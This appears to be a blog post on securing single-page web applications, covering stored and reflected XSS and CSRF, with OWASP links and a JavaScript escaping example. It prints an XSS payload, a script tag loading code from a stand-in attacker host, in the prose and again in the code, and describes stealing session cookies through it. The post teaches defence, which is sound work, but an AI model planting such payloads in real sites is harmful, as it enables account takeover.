Security Measures for Your Single Page Application

Building a secure application is always a puzzle for many of us. This is especially true when you need to secure a single-page Java web application, where much of the work happens in the browser, outside your control. This post discusses this problem along with some of the popular preventive measures available today to secure your single-page web application.

What is a Single Page Application?

In earlier days web browsers were not nearly as powerful as the ones we see today. We used to build web applications by moving most of the processing logic to the server, leaving the browser as a simple means of rendering the DOM returned by the server. Simple user actions like clicking a button or scrolling a page were all handled on the server. Over time browsers became richer in functionality, and we have witnessed JavaScript emerging as a powerful scripting language.

A single-page application (SPA) is a web application that interacts with the user by dynamically rewriting the current page rather than loading entire new pages from a server. In other words, a single-page application makes use of modern browser capabilities and responds to user actions such as clicking a button or navigating to a new page according to the logic defined in the JavaScript running in the browser. Let us go ahead and take a look at some of the common security attacks and some preventive measures for them.

Common Security Attacks

The security attacks discussed in this section are not really unique to SPAs; rather, they apply to any web application. However, SPAs are more exposed to attack, as a major portion of the UI code runs in the browser, leaving all traces of user actions and server interactions on the browser running on the end user's machine.

Cross site scripting (XSS)

Cross site scripting (XSS) is a very common attack that injects malicious code into a vulnerable web application. There are two categories of XSS attacks:

Stored or Persistent XSS

Stored or persistent XSS attacks happen when an application takes user input without validating the contents and saves it in the server database. Later, when the user navigates to a page which displays the user input from the previous page, the server retrieves this data from the database and embeds the content in the HTML DOM without proper HTML escaping.
For example, consider a page with a field that allows a user to add comments. If there is no proper validation for this field, a hacker may try adding HTML script tags as the value for this field. This can be a link to a malicious JavaScript file on a server owned by the hacker, as shown here: <script src="http://some-server.com/malicious-script.js"></script> The web app fails to reject such input and stores it as the value of the comment field. When the application displays this comment later, the browser parses the script tag that was added as the comment value just like any regular HTML tag. This malicious script can harm the user in many ways. For instance, the script can contain code to POST customer data such as the session cookie, an unsecured access token, etc. to a REST API owned by the hacker. The hacker can use this information later to take over the user's account.

Reflected XSS

In the case of reflected XSS, the malicious script is injected by appending it to the URL. Let us take an example to get a clearer picture. Suppose a hacker is visiting a site, e.g. www.jobinesh.com. Next, the hacker may try appending some arbitrary parameter value to the URL, and if the site responds with the parameter value echoed back as is, without properly escaping it, then this site may be vulnerable to a reflected XSS attack. Here is an example: https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

You can learn more about XSS here: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Here are some options to prevent XSS: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
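Both the stored and the reflected case above come down to the same mistake: user-controlled text is concatenated into markup without HTML escaping. The following is an added example, not code from the original post, showing the vulnerable rendering beside the hardened form in plain JavaScript; the function names and the comment/search-echo markup are my own, and the payload is the one quoted above.

```javascript
// Escape the five characters that can change HTML structure or terminate an
// attribute value (HTML body and attribute contexts, as in the OWASP XSS
// Prevention Cheat Sheet). Not sufficient for JavaScript or URL contexts.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable (stored XSS): the saved comment is concatenated straight into
// markup, so a stored script tag becomes live HTML when the page renders it.
function renderCommentUnsafe(comment) {
  return '<li class="comment">' + comment + '</li>';
}

// Hardened: the same comment is escaped, so the browser shows the tags as
// text. In an SPA the equivalent is assigning to element.textContent instead
// of element.innerHTML.
function renderComment(comment) {
  return '<li class="comment">' + escapeHtml(comment) + '</li>';
}

// Reflected case: a query parameter echoed back into the page goes through
// the same escaping before it is inserted.
function renderSearchEcho(query) {
  return '<p>Results for: <b>' + escapeHtml(query) + '</b></p>';
}

// Constructed payload mirroring the one quoted in the post.
const PAYLOAD = '<script src="http://some-server.com/malicious-script.js"></script>';

console.log(renderCommentUnsafe(PAYLOAD)); // script tag lands in the DOM
console.log(renderComment(PAYLOAD));       // rendered as harmless text
```

Escaping is context-specific: this helper is for text nodes and quoted attribute values only, and data placed inside a script block, a URL or a CSS value needs the encoding the cheat sheet gives for that context.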


Cross-Site Request Forgery (CSRF)

Cross-site request forgery (CSRF) is an attack that rides on the current user's logged-in session in the browser (the browser attaches the session cookie to every request for that site automatically) and uses that session to execute unwanted actions in an application to which the user is logged in.

You can learn more about CSRF here: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
To learn about preventive measures, visit the following link: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet


Disclaimer

The views expressed on this blog are my own and do not necessarily reflect the views of my employer.